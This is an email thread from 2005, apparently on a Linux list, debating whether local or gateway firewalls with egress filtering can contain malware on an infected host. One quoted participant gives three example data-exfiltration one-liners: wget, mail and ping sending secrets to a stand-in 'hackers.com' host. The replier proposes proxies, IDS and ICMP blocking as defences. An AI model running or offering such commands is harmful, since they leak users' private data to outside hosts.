On Tue, May 31, 2005 at 06:33:10AM +0200, Frank Gruellich wrote: > * Larry Alkoff <labradley@xxxxxxxxxxxxxx> 30. May 05: > > [Zonealarm] > > In addition, it will warn if a program is asking for server rights > > although and ask for approval to grant that, although I don't understand > > what they mean by "server rights". > > AFAIK Zonealarm it means, that a program starts a server: it listens on > a port. For Unix it needs root priveleges to listen on ports below 1024 > (dunno about Windows). AFAICT any program or user can open a socket on any port if it's not already in use. > > Most Iptables scripts I've seen do very little OUTPUT filtering > > which means a malicious program, if it got access somehow, could > > have free range to send packets out. Zombie or spyware perhaps. > > While OUTPUT has nothing to do with servers, it is simply impossible. > You can't protect an infected host. Of course you can. If the firewall is on the local machine you could configure that firewall to restrict inbound and outbound traffic. If the malware doesn't have root, or doesn't have the ability to turn off firewalling, then it can't do anything on the network, or can't be reached from the network. If the firewall is on a gateway with a pretty hardcore egress filter, say nothing direct allowed out, all web traffic goes through a proxy and all email goes through the local server, then again its a lot harder for that malware to do anything if its payload involves Internet connectivity. > > The ability to block this by only allowing "approved" programs to access > > the Internet would be a nice addition to Iptables. > > Define "access the Internet". There will be some hundreds of ways for > malware to send data you can't even catch with iptables. There are some > more dozens of ways you can't block at all. How do you intend to catch > > $ wget 'http://www.hackers.com/script.php?info=this%20is%20my%20very%20secret%20information' Use a proxy? > $ echo "this is the very secret information" |mail -s "$USER@`hostname -f`" jr@xxxxxxxxxxx A mail server or Network IDS set to pick up on the terms used in such secret information. > $ ping -c1 www.this.is.my.very.secret.information.hackers.com Stop ICMP ping outbound? Why would that be needed by normal users? You can't completely block malware from accessing the Internet, but you can make it really, really difficult... -- If at first you don't succeed, destroy all the evidence that you tried.
